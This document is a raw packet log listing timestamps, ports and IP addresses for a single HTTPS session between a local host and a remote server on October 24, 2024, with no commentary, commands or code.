Oct 24, 2024 21:23:10.432010889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.432053089 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.432060003 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.432073116 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.432089090 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.432116985 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.471035957 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.471076012 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.471132994 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.471141100 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.471154928 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.491134882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.491174936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.491209030 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.491219044 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.491245985 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.524020910 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.524059057 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.524112940 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.524126053 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.524135113 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.551415920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.551487923 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.551492929 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.551527977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.551544905 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.551568031 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.551600933 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.552473068 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.552481890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.552510977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.552537918 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.552547932 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.552561045 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.590976000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.591016054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.591057062 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.591067076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.591079950 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.611133099 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.611166000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.611197948 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.611207008 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.611227989 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.611239910 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.611264944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.643934011 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.644013882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.644042015 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.644076109 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.644094944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.644094944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.671587944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.671623945 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.671683073 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.671717882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.671739101 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.671739101 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.672530890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.672559977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.672585964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.672597885 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.672614098 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.672964096 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.712152004 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.712188959 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.712239981 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.712249994 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.712285995 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.730799913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.730834961 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.730875015 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.730890036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.730902910 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.763423920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.763493061 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.763520956 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.763533115 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.763546944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.791573048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.791620016 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.791671038 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.791681051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.791697025 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.792752028 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.792782068 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.792814016 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.792820930 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.792838097 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.792848110 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.792884111 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.831665039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.831703901 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.831801891 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.831835985 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.831871986 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.831871986 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.832695007 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.832731962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.832762003 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.832771063 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.832787991 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.869240046 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.869277954 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.869472027 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.869507074 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.869555950 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.869555950 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.883915901 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.883954048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.884095907 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.884097099 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.884109020 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.912127018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.912168980 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.912240028 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.912250996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.912266970 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.913336039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.913374901 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.913400888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.913409948 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.913434029 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.952250004 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.952331066 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.952359915 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.952394009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.952415943 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.989310980 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.989362955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.989413023 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.989522934 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.989522934 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.989535093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.989589930 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.003530025 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.003544092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.003575087 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.003619909 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.003629923 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.003643036 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.003699064 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.021585941 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.021677017 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.021792889 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.021792889 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.021812916 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.032713890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.032759905 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.032792091 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.032803059 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.032818079 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.033849001 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.033879042 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.033915043 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.033927917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.033938885 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.072397947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.072438955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.072555065 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.072633028 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.072674036 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.108918905 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.108951092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.109055042 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.109080076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.109385967 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.123636007 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.123672962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.123713017 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.123718977 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.123754025 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.123883009 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.123883009 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.152113914 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.152148962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.152206898 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.152206898 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.152237892 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.152982950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.153017044 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.153055906 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.153069973 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.153100967 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.154165983 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.154201031 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.154234886 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.154257059 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.154284000 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.196453094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.196491003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.196551085 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.196552038 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.196620941 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.234395981 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.234432936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.234536886 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.234538078 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.234611034 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.234663963 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.247354984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.247392893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.247437000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.247441053 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.247462988 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.247490883 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.247526884 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.248389959 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.248420000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.248584032 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.248584032 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.248655081 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.272752047 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.272783041 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.272944927 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.272945881 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.272945881 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.273017883 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.273572922 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.273602009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.273642063 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.273669958 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.273698092 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317006111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317049026 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317116022 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317143917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317172050 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317172050 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317620039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317683935 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317692041 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317718029 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317738056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.317758083 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.317790985 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.354365110 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.354454041 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.354496956 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.354527950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.354552984 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.367991924 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.368031979 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.368105888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.368105888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.368129969 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.370951891 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.392225981 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.392263889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.392309904 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.392333031 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.392359972 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.392915964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.392956972 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.392988920 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.393002033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.393028975 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.393649101 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.393687010 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.393729925 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.393745899 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.393774033 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.437726974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437769890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437827110 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437859058 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437891006 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437926054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437937021 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.437966108 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.437990904 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.437990904 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438005924 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438021898 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438035965 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438088894 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438123941 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438158989 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438173056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438211918 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438227892 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438241959 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438281059 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438294888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438308001 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438339949 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438360929 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.438374043 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.438425064 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478456974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478533983 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478583097 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478621006 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478622913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478636980 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478665113 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478705883 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478754044 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478760004 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478774071 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478812933 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478825092 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478837967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.478885889 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.478899956 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.490931034 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.490972996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491003990 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.491019964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491075039 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.491168976 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491823912 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491858006 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491883993 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.491898060 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.491962910 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.492127895 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492422104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492480993 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492484093 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.492497921 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492553949 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.492566109 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492619991 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492697001 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.492707968 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492764950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492825031 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.492830992 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492847919 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.492904902 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518388033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518470049 CEST	443	49169	172.217.16.193	192.168.2.22
